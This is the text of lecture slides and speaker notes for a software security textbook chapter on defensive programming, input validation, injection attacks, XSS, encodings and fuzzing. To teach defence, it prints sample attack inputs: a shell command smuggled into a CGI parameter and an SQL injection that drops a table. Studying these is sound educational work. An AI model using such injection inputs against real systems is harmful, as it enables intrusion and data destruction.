Assignment

profileJB12345
CH11-CompSec4e.pptx

Computer Security:

Principles and Practice

Fourth Edition

By: William Stallings and Lawrie Brown

Lecture slides prepared for “Computer Security: Principles and Practice”, 4/e, by William Stallings and Lawrie Brown, Chapter 11 “Software Security”.

1

Chapter 11

Software Security

In Chapter 10 we describe the problem of buffer overflows, which continue to be

one of the most common and widely exploited software vulnerabilities. Although

we discuss a number of countermeasures, the best defense against this threat is not

to allow it to occur at all. That is, programs need to be written securely to prevent

such vulnerabilities occurring.

More generally, buffer overflows are just one of a range of deficiencies found

in poorly written programs. There are many vulnerabilities related to program deficiencies

that result in the subversion of security mechanisms and allow unauthorized

access and use of computer data and resources.

This chapter explores the general topic of software security. We introduce a

simple model of a computer program that helps identify where security concerns

may occur. We then explore the key issue of how to correctly handle program input

to prevent many types of vulnerabilities and more generally, how to write safe

program code and manage the interactions with other programs and the operating

system.

2

Table 11.1

CWE/SANS TOP 25 Most Dangerous Software Errors (2011)

(Table is on page 359 in the textbook)

 Many computer security vulnerabilities result from poor programming practices, which

the Veracode State of Software Security Report [VERA16] notes are far more prevalent

than most people think. The CWE/SANS Top 25 Most Dangerous Software

Errors list, summarized in Table 11.1, details the consensus view on the poor programming

practices that are the cause of the majority of cyber attacks. These errors are grouped

into three categories: insecure interaction between components, risky resource management,

and porous defenses.

3

Security Flaws

These flaws occur as a consequence of insufficient checking and validation of data and error codes in programs

Awareness of these issues is a critical initial step in writing more secure program code

Emphasis should be placed on the need for software developers to address these known areas of concern

Critical Web application security flaws include five related to insecure software code

Unvalidated input

Cross-site scripting

Buffer overflow

Injection flaws

Improper error handling

 Similarly, the Open Web Application Security Project

 Top Ten [OWAS13] list of critical Web application security flaws includes five related

to insecure software code. These include unvalidated input, cross-site scripting, buffer

overflow, injection flaws, and improper error handling. These flaws occur as a consequence

of insufficient checking and validation of data and error codes in programs. We

will discuss most of these flaws in this chapter. Awareness of these issues is a critical

initial step in writing more secure program code. Both these sources emphasize the need

for software developers to address these known areas of concern, and provide guidance

on how this is done.

4

Reducing Software Vulnerabilities

The NIST report NISTIR 8151 presents a range of approaches to reduce the number of software vulnerabilities

It recommends:

Stopping vulnerabilities before they occur by using improved methods for specifying and building software

Finding vulnerabilities before they can be exploited by using better and more efficient testing techniques

Reducing the impact of vulnerabilities by building more resilient architectures

 The NIST report NISTIR 8151 (Dramatically Reducing Software

Vulnerabilities , October 2016) presents a range of approaches with the

aim of dramatically reducing the number of software vulnerabilities.

It recommends the following:

•  Stopping vulnerabilities before they occur by using improved methods for

specifying and building software.

•  Finding vulnerabilities before they can be exploited by using better and more

efficient testing techniques.

•  Reducing the impact of vulnerabilities by building more resilient architectures.

5

Software Security, Quality and Reliability

Software quality and reliability:

Concerned with the accidental failure of program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code

Improve using structured design and testing to identify and eliminate as many bugs as possible from a program

Concern is not how many bugs, but how often they are triggered

Software security:

Attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker

Triggered by inputs that differ dramatically from what is usually expected

Unlikely to be identified by common testing approaches

6

Software security is closely related to software quality and reliability, but with

subtle differences. Software quality and reliability is concerned with the accidental

failure of a program as a result of some theoretically random, unanticipated input,

system interaction, or use of incorrect code. These failures are expected to follow

some form of probability distribution. The usual approach to improve software

quality is to use some form of structured design and testing to identify and eliminate

as many bugs as is reasonably possible from a program. The testing usually

involves variations of likely inputs and common errors, with the intent of minimizing

the number of bugs that would be seen in general use. The concern is not the total

number of bugs in a program, but how often they are triggered, resulting in program

failure.

Software security differs in that the attacker chooses the probability distribution,

targeting specific bugs that result in a failure that can be exploited by the attacker.

These bugs may often be triggered by inputs that differ dramatically from what is

usually expected and hence are unlikely to be identified by common testing approaches.

Defensive Programming

Designing and implementing software so that it continues to function even when under attack

Requires attention to all aspects of program execution, environment, and type of data it processes

Software is able to detect erroneous conditions resulting from some attack

Also referred to as secure programming

Key rule is to never assume anything, check all assumptions and handle any possible error states

7

Writing secure, safe code requires attention to all aspects of how a program executes,

the environment it executes in, and the type of data it processes. Nothing can be

assumed, and all potential errors must be checked. These issues are highlighted in the

following definition:

Defensive or Secure Programming is the process of designing and implementing

software so that it continues to function even when under attack. Software

written using this process is able to detect erroneous conditions resulting from

some attack, and to either continue executing safely, or to fail gracefully. The

key rule in defensive programming is to never assume anything, but to check all

assumptions and to handle any possible error states.

8

This definition emphasizes the need to make explicit any assumptions about how

a program will run, and the types of input it will process. To help clarify the issues,

consider the abstract model of a program shown in Figure 11.1. This illustrates

the concepts taught in most introductory programming courses. A program reads

input data from a variety of possible sources, processes that data according to some

algorithm, and then generates output, possibly to multiple different destinations. It

executes in the environment provided by some operating system, using the machine

instructions of some specific processor type. While processing the data, the program

will use system calls, and possibly other programs available on the system. These

may result in data being saved or modified on the system or cause some other side

effect as a result of the program execution. All of these aspects can interact with

each other, often in complex ways.

Defensive Programming

Programmers often make assumptions about the type of inputs a program will receive and the environment it executes in

Assumptions need to be validated by the program and all potential failures handled gracefully and safely

Requires a changed mindset to traditional programming practices

Programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs

Conflicts with business pressures to keep development times as short as possible to maximize market advantage

When writing a program, programmers typically focus on what is needed to

solve whatever problem the program addresses. Hence their attention is on the steps

needed for success and the normal flow of execution of the program rather than

considering every potential point of failure. They often make assumptions about the

type of inputs a program will receive and the environment it executes in. Defensive

programming means these assumptions need to be validated by the program and all

potential failures handled gracefully and safely. Correctly anticipating, checking,

and handling all possible errors will certainly increase the amount of code needed

in, and the time taken to write, a program. This conflicts with business pressures to

keep development times as short as possible to maximize market advantage. Unless

software security is a design goal, addressed from the start of program development,

a secure program is unlikely to result.

Further, when changes are required to a program, the programmer often

focuses on the changes required and what needs to be achieved. Again, defensive

programming means that the programmer must carefully check any assumptions

made, check and handle all possible errors, and carefully check any interactions with

existing code. Failure to identify and manage such interactions can result in incorrect

program behavior and the introduction of vulnerabilities into a previously secure

program.

Defensive programming thus requires a changed mindset to traditional

programming practices, with their emphasis on programs that solve the desired

problem for most users, most of the time. This changed mindset means the

programmer needs an awareness of the consequences of failure and the techniques

used by attackers. Paranoia is a virtue, because the enormous growth in vulnerability

reports really does show that attackers are out to get you! This mindset has to

recognize that normal testing techniques will not identify many of the vulnerabilities

that may exist but that are triggered by highly unusual and unexpected inputs.

It means that lessons must be learned from previous failures, ensuring that new

programs will not suffer the same weaknesses. It means that programs should be

engineered, as far as possible, to be as resilient as possible in the face of any error

or unexpected condition. Defensive programmers have to understand how failures

can occur and the steps needed to reduce the chance of them occurring in their

programs.

9

Security by Design

Security and reliability are common design goals in most engineering disciplines

Software development not as mature

Recent years have seen increasing efforts to improve secure software development processes

Software Assurance Forum for Excellence in Code (SAFECode)

Develop publications outlining industry best practices for software assurance and providing practical advice for implementing proven methods for secure software development

10

The necessity for security and reliability to be design goals from the inception

of a project has long been recognized by most engineering disciplines. Society

in general is intolerant of bridges collapsing, buildings falling down, or airplanes

crashing. The design of such items is expected to provide a high likelihood that these

catastrophic events will not occur. Software development has not yet reached this

level of maturity, and society tolerates far higher levels of failure in software than

it does in other engineering disciplines. This is despite the best efforts of software

engineers and the development of a number of software development and quality

standards such as ISO12207 (Information technology - Software lifecycle processes, 1997)

or [SEI06]. While the focus of these standards is on the general

software development life cycle, they increasingly identify security as a key design

goal. Recent years have seen increasing efforts to improve secure software

development processes. The Software Assurance Forum for Excellence in Code

(SAFECode), with a number of major IT industry companies as members, develop

publications outlining industry best practices for software assurance and providing

practical advice for implementing proven methods for secure software development,

including [SIMP11]. We discuss many of their recommended software security

practices in this chapter.

However, the broader topic of software development techniques and standards,

and the integration of security with them, is well beyond the scope of this text.

[MCGR06] and [VIEG01] provide much greater detail on these topics. [SIMP11]

recommends incorporating threat modeling, also known as risk analysis, as part

of the design process. We discuss this area more generally in Chapter 14. Here we

explore some specific software security issues that should be incorporated into a

wider development methodology. We examine the software security concerns of the

various interactions with an executing program, as illustrated in Figure 11.1. We start

with the critical issue of safe input handling, followed by security concerns

related to algorithm implementation, interaction with other components, and program

Output. When looking at these potential areas of concern, it is worth acknowledging

that many security vulnerabilities result from a small set of common mistakes. We

discuss a number of these.

The examples in this chapter focus primarily on problems seen in Web application

security. The rapid development of such applications, often by developers with

insufficient awareness of security concerns, and their accessibility via the Internet to

a potentially large pool of attackers mean these applications are particularly vulnerable.

However, we emphasize that the principles discussed apply to all programs.

Safe programming practices should always be followed, even for seemingly innocuous

programs, because it is very difficult to predict the future uses of programs. It

is always possible that a simple utility, designed for local use, may later be incorporated

into a larger application, perhaps Web enabled, with significantly different

security concerns.

Handling Program Input

11

Incorrect handling of program input is one of the most common failings in software

security. Program input refers to any source of data that originates outside the

program and whose value is not explicitly known by the programmer when the

code was written. This obviously includes data read into the program from user

keyboard or mouse entry, files, or network connections. However, it also includes

data supplied to the program in the execution environment, the values of any configuration

or other data read from files by the program, and values supplied by the

operating system to the program. All sources of input data, and any assumptions

about the size and type of values they take, have to be identified. Those assumptions

must be explicitly verified by the program code, and the values must be used

in a manner consistent with these assumptions. The two key areas of concern for

any input are the size of the input and the meaning and interpretation of the input.

Incorrect handling is a very common failing

Input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written

Must identify all data sources

Explicitly validate assumptions on size and type of values before use

Input Size & Buffer Overflow

Programmers often make assumptions about the maximum expected size of input

Allocated buffer size is not confirmed

Resulting in buffer overflow

Testing may not identify vulnerability

Test inputs are unlikely to include large enough inputs to trigger the overflow

Safe coding treats all input as dangerous

12

When reading or copying input from some source, programmers often make

assumptions about the maximum expected size of input. If the input is text entered

by the user, either as a command-line argument to the program or in response to

a prompt for input, the assumption is often that this input would not exceed a few

lines in size. Consequently, the programmer allocates a buffer of typically 512 or

1024 bytes to hold this input but often does not check to confirm that the input is

indeed no more than this size. If it does exceed the size of the buffer, then a buffer

overflow occurs, which can potentially compromise the execution of the program.

We discuss the problems of buffer overflows in detail in Chapter 10 . Testing of such

programs may well not identify the buffer overflow vulnerability, as the test inputs

provided would usually reflect the range of inputs the programmers expect users to

provide. These test inputs are unlikely to include sufficiently large inputs to trigger

the overflow, unless this vulnerability is being explicitly tested.

A number of widely used standard C library routines, some listed in Table 10.2 ,

compound this problem by not providing any means of limiting the amount of data

transferred to the space available in the buffer. We discuss a range of safe programming

practices related to preventing buffer overflows in Section 10.2.  These include

the use of safe string and buffer copying routines, and an awareness of these software

security traps by programmers.

Writing code that is safe against buffer overflows requires a mindset that

regards any input as dangerous and processes it in a manner that does not expose

the program to danger. With respect to the size of input, this means either using a

dynamically sized buffer to ensure that sufficient space is available or processing

the input in buffer sized blocks. Even if dynamically sized buffers are used, care

is needed to ensure that the space requested does not exceed available memory.

Should this occur, the program must handle this error gracefully. This may involve

processing the input in blocks, discarding excess input, terminating the program, or

any other action that is reasonable in response to such an abnormal situation. These

checks must apply wherever data whose value is unknown enter, or are manipulated

by, the program. They must also apply to all potential sources of input.

Interpretation of Program Input

Program input may be binary or text

Binary interpretation depends on encoding and is usually application specific

There is an increasing variety of character sets being used

Care is needed to identify just which set is being used and what characters are being read

Failure to validate may result in an exploitable vulnerability

2014 Heartbleed OpenSSL bug is a recent example of a failure to check the validity of a binary input value

13

The other key concern with program input is its meaning and interpretation.

Program input data may be broadly classified as textual or binary. When processing

binary data, the program assumes some interpretation of the raw binary values

as representing integers, floating-point numbers, character strings, or some more

complex structured data representation. The assumed interpretation must be validated

as the binary values are read. The details of how this is done will depend

very much on the particular interpretation of encoding of the information. As an

example, consider the complex binary structures used by network protocols in

Ethernet frames, IP packets, and TCP segments, which the networking code must

carefully construct and validate. At a higher layer, DNS, SNMP, NFS, and other

protocols use binary encoding of the requests and responses exchanged between

parties using these protocols. These are often specified using some abstract syntax

language, and any specified values must be validated against this specification.

The 2014 Heartbleed OpenSSL bug, that we discuss further in Section 22.3, is

a recent example of a failure to check the validity of a binary input value. Because

of a coding error, failing to check the amount of data requested for return against

the amount supplied, an attacker could access the contents of adjacent memory.

This memory could contain information such as user names and passwords, private

keys, and other sensitive information. This bug potentially compromised a very

large numbers of servers and their users. It is an example of a buffer over-read.

More commonly, programs process textual data as input. The raw binary

values are interpreted as representing characters, according to some character set.

Traditionally, the ASCII character set was assumed, although common systems like

Windows and Mac OS X both use different extensions to manage accented characters.

With increasing internationalization of programs, there is an increasing variety

of character sets being used. Care is needed to identify just which set is being used,

and hence just what characters are being read.

Beyond identifying which characters are input, their meaning must be identified.

They may represent an integer or floating-point number. They might be a filename,

a URL, an e-mail address, or an identifier of some form. Depending on how these

inputs are used, it may be necessary to confirm that the values entered do indeed

represent the expected type of data. Failure to do so could result in a vulnerability

that permits an attacker to influence the operation of the program, with possibly

serious consequences.

To illustrate the problems with interpretation of textual input data, we first

discuss the general class of injection attacks that exploit failure to validate the interpretation

of input. We then review mechanisms for validating input data and the

handling of internationalized inputs using a variety of character sets.

Injection Attacks

Flaws relating to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program

14

The term injection attack refers to a wide variety of program

flaws related to invalid handling of input data. Specifically, this problem occurs

when program input data can accidentally or deliberately influence the flow of

execution of the program. There are a wide variety of mechanisms by which this

can occur. One of the most common is when input data are passed as a parameter

to another helper program on the system, whose output is then processed and used

by the original program. This most often occurs when programs are developed using

scripting languages such as perl, PHP, python, sh, and many others. Such languages

encourage the reuse of other existing programs and system utilities where possible

to save coding effort. They may be used to develop applications on some system.

More commonly, they are now often used as Web CGI scripts to process data

supplied from HTML forms.

Most often occur in scripting languages

Encourage reuse of other programs and system utilities where possible to save coding effort

Often used as Web CGI scripts

15

Consider the example perl CGI script shown in Figure 11.2a , which is

designed to return some basic details on the specified user using the UNIX finger

command. This script would be placed in a suitable location on the Web server

and invoked in response to a simple form, such as that shown in Figure 11.2b .

The script retrieves the desired information by running a program on the server

system, and returning the output of that program, suitably reformatted if necessary,

in a HTML Web page. This type of simple form and associated handler

were widely seen and were often presented as simple examples of how to write

and use CGI scripts. Unfortunately, this script contains a critical vulnerability.

The value of the user is passed directly to the finger program as a parameter. If

the identifier of a legitimate user is supplied, for example, lpb, then the output

will be the information on that user, as shown first in Figure 11.2c .

However, if an attacker provides a value that includes shell meta-characters, for example, xxx;

echo attack success; ls -1 finger*, then the result is then shown in

Figure 11.2c . The attacker is able to run any program on the system with the privileges

of the Web server. In this example the extra commands were just to display a

message and list some files in the Web directory. But any command could be used.

This is known as a command injection attack, because the input is used in the

construction of a command that is subsequently executed by the system with the

privileges of the Web server. It illustrates the problem caused by insufficient checking

of program input. The main concern of this script’s designer was to provide

Web access to an existing system utility. The expectation was that the input supplied

would be the login or name of some user, as it is when a user on the system runs the

finger program. Such a user could clearly supply the values used in the command

injection attack, but the result is to run the programs with their existing privileges. It

is only when the Web interface is provided, where the program is now run with the

privileges of the Web server but with parameters supplied by an unknown external

user, that the security concerns arise.

To counter this attack, a defensive programmer needs to explicitly identify

any assumptions as to the form of input and to verify that any input data conform

to those assumptions before any use of the data. This is usually done by comparing

the input data to a pattern that describes the data’s assumed form and rejecting any

input that fails this test. We discuss the use of pattern matching in the subsection on

input validation later in this section. A suitable extension of the vulnerable finger

CGI script is shown in Figure 11.2d. This adds a test that ensures that the user input

contains just alphanumeric characters. If not, the script terminates with an error

message specifying that the supplied input contained illegal characters. Note that

while this example uses perl, the same type of error can occur in a CGI program

written in any language. While the solution details differ, they all involve checking

that the input matches assumptions about its form.

16

 Another widely exploited variant of this attack is SQL injection, that we introduced

and described in chapter 5.4. In this attack, the user-supplied input is used

to construct a SQL request to retrieve information from a database. Consider the

excerpt of PHP code from a CGI script shown in Figure 11.3a. It takes a name provided

as input to the script, typically from a form field similar to that shown in Figure

11.2b. It uses this value to construct a request to retrieve the records relating to that

name from the database. The vulnerability in this code is very similar to that in the

command injection example. The difference is that SQL metacharacters are used,

rather than shell metacharacters. If a suitable name is provided, for example, Bob,

 then the code works as intended, retrieving the desired record. However, an input

such as Bob'; drop table suppliers  results in the specified record being

retrieved, followed by deletion of the entire table! This would have rather unfortunate

consequences for subsequent users. To prevent this type of attack, the input

must be validated before use. Any metacharacters must either be escaped, canceling

their effect, or the input rejected entirely. Given the widespread recognition of SQL

injection attacks, many languages used by CGI scripts contain functions that can

sanitize any input that is subsequently included in a SQL request. The code shown in

Figure 11.3b illustrates the use of a suitable PHP function to correct this vulnerability.

Alternatively, rather than constructing SQL statements directly by concatenating

values, recent advisories recommend the use of SQL placeholders or parameters to

securely build SQL statements. Combined with the use of stored procedures, this can

result in more robust and secure code.

17

A third common variant is the code injection attack, where the input includes

code that is then executed by the attacked system. Many of the buffer overflow

examples we discuss in Chapter 10 include a code injection component. In those

cases, the injected code is binary machine language for a specific computer system.

However, there are also significant concerns about the injection of scripting language

code into remotely executed scripts. Figure 11.4a illustrates a few lines from

the start of a vulnerable PHP calendar script. The flaw results from the use of a

variable to construct the name of a file that is then included into the script. Note

that this script was not intended to be called directly. Rather, it is a component of

a larger, multifile program. The main script set the value of the $path variable to

refer to the main directory containing the program and all its code and data files.

Using this variable elsewhere in the program meant that customizing and installing

the program required changes to just a few lines. Unfortunately, attackers do not

play by the rules. Just because a script is not supposed to be called directly does not

mean it is not possible. The access protections must be configured in the Web server

to block direct access to prevent this. Otherwise, if direct access to such scripts is

combined with two other features of PHP, a serious attack is possible. The first is

that PHP originally assigned the value of any input variable supplied in the HTTP

request to global variables with the same name as the field. This made the task

of writing a form handler easier for inexperienced programmers. Unfortunately,

there was no way for the script to limit just which fields it expected. Hence a user

could specify values for any desired global variable and they would be created and

passed to the script. In this example, the variable $path is not expected to be a

form field. The second PHP feature concerns the behavior of the include command.

Not only could local files be included, but if a URL is supplied, the included

code can be sourced from anywhere on the network. Combine all of these elements,

and the attack may be implemented using a request similar to that shown in Figure

11.4b . This results in the $path variable containing the URL of a file containing the

attacker’s PHP code. It also defines another variable, $cmd, which tells the attacker’s

 script what command to run. In this example, the extra command simply lists files

in the current directory. However, it could be any command the Web server has the

privilege to run. This specific type of attack is known as a PHP remote code injection

or PHP file inclusion vulnerability. Research shows that a significant number of PHP

CGI scripts are vulnerable to this type of attack and are being actively exploited.

There are several defenses available to prevent this type of attack. The most

obvious is to block assignment of form field values to global variables. Rather,

they are saved in an array and must be explicitly be retrieved by name. This

behavior is illustrated by the code in Figure 11.3 . It is the default for all newer PHP

installations. The disadvantage of this approach is that it breaks any code written

using the older assumed behavior. Correcting such code may take a considerable

amount of effort. Nonetheless, except in carefully controlled cases, this is

the preferred option. It not only prevents this specific type of attack, but a wide

variety of other attacks involving manipulation of global variable values. Another

defense is to only use constant values in include (and require) commands.

This ensures that the included code does indeed originate from the specified files.

If a variable has to be used, then great care must be taken to validate its value

immediately before it is used.

There are other injection attack variants, including mail injection, format

string injection, and interpreter injection. New injection attacks variants continue

to be found. They can occur whenever one program invokes the services of

another program, service, or function and passes to it externally sourced, potentially

untrusted information without sufficient inspection and validation of it. This just

emphasizes the need to identify all sources of input, to validate any assumptions

about such input before use, and to understand the meaning and interpretation of

values supplied to any invoked program, service, or function.

Cross Site Scripting (XSS) Attacks

18

Another broad class of vulnerabilities concerns

input provided to a program by one user that is subsequently output to another

user. Such attacks are known as cross-site scripting (XSS ) attacks because they are

most commonly seen in scripted Web applications. This vulnerability involves the

inclusion of script code in the HTML content of a Web page displayed by a user’s

browser. The script code could be JavaScript, ActiveX, VBScript, Flash, or just about

any client-side scripting language supported by a user’s browser. To support some

categories of Web applications, script code may need to access data associated with

other pages currently displayed by the user’s browser. Because this clearly raises

security concerns, browsers impose security checks and restrict such data access to

pages originating from the same site. The assumption is that all content from one site

is equally trusted and hence is permitted to interact with other content from that site.

Cross-site scripting attacks exploit this assumption and attempt to bypass the

browser’s security checks to gain elevated access privileges to sensitive data belonging

to another site. These data can include page contents, session cookies, and a

variety of other objects. Attackers use a variety of mechanisms to inject malicious

script content into pages returned to users by the targeted sites. The most common

variant is the XSS reflection vulnerability. The attacker includes the malicious script

content in data supplied to a site. If this content is subsequently displayed to other

users without sufficient checking, they will execute the script assuming it is trusted

to access any data associated with that site. Consider the widespread use of guestbook

programs, wikis, and blogs by many Web sites. They all allow users accessing

the site to leave comments, which are subsequently viewed by other users. Unless

the contents of these comments are checked and any dangerous code removed, the

attack is possible.

Attacks where input provided by one user is subsequently output to another user

Commonly seen in scripted Web applications

Vulnerability involves the inclusion of script code in the HTML content

Script code may need to access data associated with other pages

Browsers impose security checks and restrict data access to pages originating from the same site

Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site

XSS reflection vulnerability

Attacker includes the malicious script content in data supplied to a site

19

Consider the example shown in Figure 11.5a . If this text were saved by a

guestbook application, then when viewed it displays a little text and then executes

the JavaScript code. This code replaces the document contents with the information

returned by the attacker’s cookie script, which is provided with the cookie

associated with this document. Many sites require users to register before using

features like a guestbook application. With this attack, the user’s cookie is supplied

to the attacker, who could then use it to impersonate the user on the original site.

This example obviously replaces the page content being viewed with whatever the

attacker’s script returns. By using more sophisticated JavaScript code, it is possible

for the script to execute with very little visible effect.

To prevent this attack, any user-supplied input should be examined and

any dangerous code removed or escaped to block its execution. While the

example shown may seem easy to check and correct, the attacker will not necessarily

make the task this easy. The same code is shown in Figure 11.5b , but this

time all of the characters relating to the script code are encoded using HTML

character entities. While the browser interprets this identically to the code in

Figure 11.5a , any validation code must first translate such entities to the characters

they represent before checking for potential attack code. We discuss this

further in the next section.

XSS attacks illustrate a failure to correctly handle both program input and

program output. The failure to check and validate the input results in potentially

dangerous data values being saved by the program. However, the program is not the

target. Rather it is subsequent users of the program, and the programs they use to

access it, which are the target. If all potentially unsafe data output by the program

are sanitized, then the attack cannot occur. We discuss correct handling of output

in Section 11.5 .

There are other attacks similar to XSS, including cross-site request forgery,

and HTTP response splitting. Again the issue is careless use of untrusted,

unchecked input.

Validating Input Syntax

20

Given that the programmer cannot control the content of input data, it is necessary

to ensure that such data conform with any assumptions made about the data

before subsequent use. If the data are textual, these assumptions may be that the

data contain only printable characters, have certain HTML markup, are the name

of a person, a userid, an e-mail address, a filename, and/or a URL. Alternatively,

the data might represent an integer or other numeric value. A program using such

input should confirm that it meets these assumptions. An important principle is that

input data should be compared against what is wanted, accepting only valid input.

The alternative is to compare the input data with known dangerous values. The

problem with this approach is that new problems and methods of bypassing existing

checks continue to be discovered. By trying to block known dangerous input data,

an attacker using a new encoding may succeed. By only accepting known safe data,

the program is more likely to remain secure.

This type of comparison is commonly done using regular expressions. It may

be explicitly coded by the programmer or may be implicitly included in a supplied

input processing routine. Figures 11.2d and 11.3b show examples of these two

approaches. A regular expression is a pattern composed of a sequence of characters

that describe allowable input variants. Some characters in a regular expression are

treated literally, and the input compared to them must contain those characters at

that point. Other characters have special meanings, allowing the specification of

alternative sets of characters, classes of characters, and repeated characters. Details

of regular expression content and usage vary from language to language. An appropriate

reference should be consulted for the language in use.

If the input data fail the comparison, they could be rejected. In this case a

suitable error message should be sent to the source of the input to allow it to be

corrected and reentered. Alternatively, the data may be altered to conform. This

generally involves escaping metacharacters to remove any special interpretation,

thus rendering the input safe.

It is necessary to ensure that data conform with any assumptions made about the data before subsequent use

Input data should be compared against what is wanted

Alternative is to compare the input data with known dangerous values

By only accepting known safe data the program is more likely to remain secure

Alternate Encodings

21

Figure 11.5 illustrates a further issue of multiple, alternative encodings of the

input data, This could occur because the data are encoded in HTML or some other

structured encoding that allows multiple representations of characters. It can also

occur because some character set encodings include multiple encodings of the same

character. This is particularly obvious with the use of Unicode and its UTF-8 encoding.

Traditionally, computer programmers assumed the use of a single, common, character

set, which in many cases was ASCII. This 7-bit character set includes all the

common English letters, numbers, and punctuation characters. It also includes a

number of common control characters used in computer and data communications

applications. However, it is unable to represent the additional accented characters

used in many European languages nor the much larger number of characters used in

languages such as Chinese and Japanese. There is a growing requirement to support

users around the globe and to interact with them using their own languages. The

Unicode character set is now widely used for this purpose. It is the native character

set used in the Java language, for example. It is also the native character set used

by operating systems such as Windows XP and later. Unicode uses a 16-bit value

to represent each character. This provides sufficient characters to represent most

of those used by the world’s languages. However, many programs, databases, and

other computer and communications applications assume an 8-bit character representation,

with the first 128 values corresponding to ASCII. To accommodate this,

a Unicode character can be encoded as a 1- to 4-byte sequence using the UTF-8

encoding. Any specific character is supposed to have a unique encoding. However,

if the strict limits in the specification are ignored, common ASCII characters may

have multiple encodings. For example, the forward slash character “/”, used to

separate directories in a UNIX filename, has the hexadecimal value “2F” in both

ASCII and UTF-8. UTF-8 also allows the redundant, longer encodings: “C0 AF”and

“E0 80 AF”. While strictly only the shortest encoding should be used, many

Unicode decoders accept any valid equivalent sequence.

Consider the consequences of multiple encodings when validating input.

There is a class of attacks that attempt to supply an absolute pathname for a file to

a script that expects only a simple local filename. The common check to prevent

this is to ensure that the supplied filename does not start with “/” and does not

contain any “../” parent directory references. If this check only assumes the correct,

shortest UTF-8 encoding of slash, then an attacker using one of the longer encodings

could avoid this check. This precise attack and flaw was used against a number

of versions of Microsoft’s IIS Web server in the late 1990s. A related issue occurs

when the application treats a number of characters as equivalent. For example, a

case insensitive application that also ignores letter accents could have 30 equivalent

representations of the letter A. These examples demonstrate the problems

both with multiple encodings, and with checking for dangerous data values rather

than accepting known safe values. In this example, a comparison against a safe

specification of a filename would have rejected some names with alternate encodings

that were actually acceptable. However, it would definitely have rejected the

dangerous input values.

Given the possibility of multiple encodings, the input data must first be

transformed into a single, standard, minimal representation. This process is called

canonicalization and involves replacing alternate, equivalent encodings by one

common value. Once this is done, the input data can then be compared with a

single representation of acceptable input values. There may potentially be a large

number of input and output fields that require checking. [SIMP11] and others

recommend the use of anti-XSS libraries, or web UI frameworks with integrated

XSS protection, that automate much of the checking process, rather than writing

explicit checks for each field.

May have multiple means of encoding text

Growing requirement to support users around the globe and to interact with them using their own languages

Unicode used for internationalization

Uses 16-bit value for characters

UTF-8 encodes as 1-4 byte sequences

Many Unicode decoders accept any valid equivalent sequence

Canonicalization

Transforming input data into a single, standard, minimal representation

Once this is done the input data can be compared with a single representation of acceptable input values

Validating Numeric Input

Additional concern when input data represents numeric values

Internally stored in fixed sized value

8, 16, 32, 64-bit integers

Floating point numbers depend on the processor used

Values may be signed or unsigned

Must correctly interpret text form and process consistently

Have issues comparing signed to unsigned

Could be used to thwart buffer overflow check

22

There is an additional concern when the input data represents a numeric

value. Such values are represented on a computer by a fixed size value. Integers are

commonly 8, 16, 32, and now 64 bits in size. Floating-point numbers may be 32, 64,

96, or other numbers of bits, depending on the computer processor used. These values

may also be signed or unsigned. When the input data are interpreted, the various

representations of numeric values, including optional sign, leading zeroes, decimal

values, and power values, must be handled appropriately. The subsequent use of

numeric values must also be monitored. Problems particularly occur when a value

of one size or form is cast to another. For example, a buffer size may be read as an

unsigned integer. It may later be compared with the acceptable maximum buffer size.

Depending on the language used, the size value that was input as unsigned may subsequently

be treated as a signed value in some comparison. This leads to a vulnerability

because negative values have the top bit set. This is the same bit pattern used by

large positive values in unsigned integers. So the attacker could specify a very large

actual input data length, which is treated as a negative number when compared with

the maximum buffer size. Being a negative number, it clearly satisfies a comparison

with a smaller, positive buffer size. However, when used, the actual data are much

larger than the buffer allows, and an overflow occurs as a consequence of incorrect

handling of the input size data. Once again, care is needed to check assumptions

about data values and to ensure that all use is consistent with these assumptions.

Input Fuzzing

23

Clearly, there is a problem anticipating and testing for all potential types of nonstandard

inputs that might be exploited by an attacker to subvert a program.

A powerful, alternative approach called fuzzing was developed by Professor Barton

Miller at the University of Wisconsin Madison in 1989. This is a software testing

technique that uses randomly generated data as inputs to a program. The range of

inputs that may be explored is very large. They include direct textual or graphic

input to a program, random network requests directed at a Web or other distributed

service, or random parameters values passed to standard library or system functions.

The intent is to determine whether the program or function correctly handles

all such abnormal inputs or whether it crashes or otherwise fails to respond appropriately.

In the latter cases the program or function clearly has a bug that needs to

be corrected. The major advantage of fuzzing is its simplicity and its freedom from

assumptions about the expected input to any program, service, or function. The cost

of generating large numbers of tests is very low. Further, such testing assists in identifying

reliability as well as security deficiencies in programs.

While the input can be completely randomly generated, it may also be randomly

generated according to some template. Such templates are designed to examine

likely scenarios for bugs. This might include excessively long inputs or textual

inputs that contain no spaces or other word boundaries, for example. When used

with network protocols, a template might specifically target critical aspects of the

protocol. The intent of using such templates is to increase the likelihood of locating

bugs. The disadvantage is that the templates incorporate assumptions about the

input. Hence bugs triggered by other forms of input would be missed. This suggests

that a combination of these approaches is needed for a reasonably comprehensive

coverage of the inputs.

Professor Miller’s team has applied fuzzing tests to a number of common

operating systems and applications. These include common command-line and GUI

applications running on Linux, Windows NT, and, most recently, MacOS. The

results of the latest tests are summarized in [MILL07], which identifies a number of

programs with bugs in these various systems. Other organizations have used these

tests on a variety of systems and software.

While fuzzing is a conceptually very simple testing method, it does have its

limitations. In general, fuzzing only identifies simple types of faults with handling of

input. If a bug exists that is only triggered by a small number of very specific input

values, fuzzing is unlikely to locate it. However, the types of bugs it does locate are

very often serious and potentially exploitable. Hence it ought to be deployed as a

component of any reasonably comprehensive testing strategy.

A number of tools to perform fuzzing tests are now available and are used

by organizations and individuals to evaluate security of programs and applications.

They include the ability to fuzz command-line arguments, environment variables,

Web applications, file formats, network protocols, and various forms of interprocess

communications. A number of suitable black box test tools, include fuzzing tests,

are described in [MIRA05]. Such tools are being used by organizations to improve

the security of their software. Fuzzing is also used by attackers to identify potentially

useful bugs in commonly deployed software. Hence it is becoming increasingly

important for developer and maintainers to also use this technique to locate and

correct such bugs before they are found and exploited by attackers.

Developed by Professor Barton Miller at the University of Wisconsin Madison in 1989

Software testing technique that uses randomly generated data as inputs to a program

Range of inputs is very large

Intent is to determine if the program or function correctly handles abnormal inputs

Simple, free of assumptions, cheap

Assists with reliability as well as security

Can also use templates to generate classes of known problem inputs

